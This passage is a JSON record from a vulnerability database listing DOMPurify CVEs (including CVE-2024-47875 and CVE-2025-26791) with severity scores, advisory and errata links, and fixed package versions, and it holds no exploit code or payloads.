om/errata/RHSA-2025:8544","reference_id":"RHSA-2025:8544","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:8544"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:8551","reference_id":"RHSA-2025:8551","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:8551"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/371910?format=json","purl":"pkg:npm/dompurify@2.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.4.2"}],"aliases":["CVE-2024-48910","GHSA-p3vf-v8qc-cwcr"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wmjr-1h3n-hbhb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20937?format=json","vulnerability_id":"VCID-z8n7-dz6p-zqfb","summary":"","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47875.json","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-47875.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47875","reference_id":"","reference_type":"","scores":[{"value":"0.00699","scoring_system":"epss","scoring_elements":"0.72542","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00699","scoring_system":"epss","scoring_elements":"0.72547","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00699","scoring_system":"epss","scoring_elements":"0.72532","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00699","scoring_system":"epss","scoring_elements":"0.72455","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-47875"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47875","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47875"},{"reference_url":"http://seclists.org/fulldisclosure/2025/Apr/14","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://seclists.org/fulldisclosure/2025/Apr/14"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2025/02/msg00010.html"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/0ef5e537a514f904b6aa1d7ad9e749e365d7185f","reference_id":"0ef5e537a514f904b6aa1d7ad9e749e365d7185f","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/0ef5e537a514f904b6aa1d7ad9e749e365d7185f"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1084983","reference_id":"1084983","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1084983"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2318052","reference_id":"2318052","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2318052"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a","reference_id":"6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/6ea80cd8b47640c20f2f230c7920b1f4ce4fdf7a"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47875","reference_id":"CVE-2024-47875","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-47875"},{"reference_url":"https://github.com/advisories/GHSA-gx9m-whjm-85jf","reference_id":"GHSA-gx9m-whjm-85jf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gx9m-whjm-85jf"},{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-gx9m-whjm-85jf","reference_id":"GHSA-gx9m-whjm-85jf","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/"}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-gx9m-whjm-85jf"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10236","reference_id":"RHSA-2024:10236","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:10236"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10988","reference_id":"RHSA-2024:10988","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:10988"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8327","reference_id":"RHSA-2024:8327","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8327"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8678","reference_id":"RHSA-2024:8678","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8678"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8683","reference_id":"RHSA-2024:8683","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8683"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8981","reference_id":"RHSA-2024:8981","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8981"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8991","reference_id":"RHSA-2024:8991","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8991"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9473","reference_id":"RHSA-2024:9473","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9473"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9620","reference_id":"RHSA-2024:9620","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9620"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:9629","reference_id":"RHSA-2024:9629","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:9629"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0329","reference_id":"RHSA-2025:0329","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0329"},{"reference_url":"https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098","reference_id":"test-suite.js#L2098","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H"},{"value":"7.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:H/SA:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-11T19:27:35Z/"}],"url":"https://github.com/cure53/DOMPurify/blob/0ef5e537a514f904b6aa1d7ad9e749e365d7185f/test/test-suite.js#L2098"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33800?format=json","purl":"pkg:npm/dompurify@2.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.0"},{"url":"http://public2.vulnerablecode.io/api/packages/33396?format=json","purl":"pkg:npm/dompurify@3.1.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-cv62-a95x-9uhe"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-r6b8-q386-3ken"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.3"}],"aliases":["CVE-2024-47875","GHSA-gx9m-whjm-85jf"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z8n7-dz6p-zqfb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/23368?format=json","vulnerability_id":"VCID-zaud-3sc4-ykcg","summary":"","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-26791.json","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-26791.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-26791","reference_id":"","reference_type":"","scores":[{"value":"0.00168","scoring_system":"epss","scoring_elements":"0.37901","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00168","scoring_system":"epss","scoring_elements":"0.37914","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00168","scoring_system":"epss","scoring_elements":"0.37888","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00168","scoring_system":"epss","scoring_elements":"0.37711","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-26791"},{"reference_url":"https://ensy.zip/posts/dompurify-323-bypass","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://ensy.zip/posts/dompurify-323-bypass"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://nsysean.github.io/posts/dompurify-323-bypass","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nsysean.github.io/posts/dompurify-323-bypass"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-26791","reference_id":"","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-26791"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1098325","reference_id":"1098325","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1098325"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2345695","reference_id":"2345695","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2345695"},{"reference_url":"https://github.com/cure53/DOMPurify/releases/tag/3.2.4","reference_id":"3.2.4","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/"}],"url":"https://github.com/cure53/DOMPurify/releases/tag/3.2.4"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/d18ffcb554e0001748865da03ac75dd7829f0f02","reference_id":"d18ffcb554e0001748865da03ac75dd7829f0f02","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/d18ffcb554e0001748865da03ac75dd7829f0f02"},{"reference_url":"https://ensy.zip/posts/dompurify-323-bypass/","reference_id":"dompurify-323-bypass","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/"}],"url":"https://ensy.zip/posts/dompurify-323-bypass/"},{"reference_url":"https://nsysean.github.io/posts/dompurify-323-bypass/","reference_id":"dompurify-323-bypass","reference_type":"","scores":[{"value":"4.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-14T15:30:30Z/"}],"url":"https://nsysean.github.io/posts/dompurify-323-bypass/"},{"reference_url":"https://github.com/advisories/GHSA-vhxf-7vqr-mrjg","reference_id":"GHSA-vhxf-7vqr-mrjg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vhxf-7vqr-mrjg"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:10020","reference_id":"RHSA-2025:10020","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:10020"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:1875","reference_id":"RHSA-2025:1875","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:1875"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:2518","reference_id":"RHSA-2025:2518","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:2518"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:3368","reference_id":"RHSA-2025:3368","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:3368"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:3397","reference_id":"RHSA-2025:3397","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:3397"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:3886","reference_id":"RHSA-2025:3886","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:3886"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:7626","reference_id":"RHSA-2025:7626","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:7626"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:2737","reference_id":"RHSA-2026:2737","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:2737"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:2769","reference_id":"RHSA-2026:2769","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:2769"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:3406","reference_id":"RHSA-2026:3406","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:3406"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377348?format=json","purl":"pkg:npm/dompurify@3.2.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-cv62-a95x-9uhe"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-r6b8-q386-3ken"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.2.4"}],"aliases":["CVE-2025-26791","GHSA-vhxf-7vqr-mrjg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zaud-3sc4-ykcg"}],"fixing_vulnerabilities":[],"risk_score":"4.5","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@0.4.3"}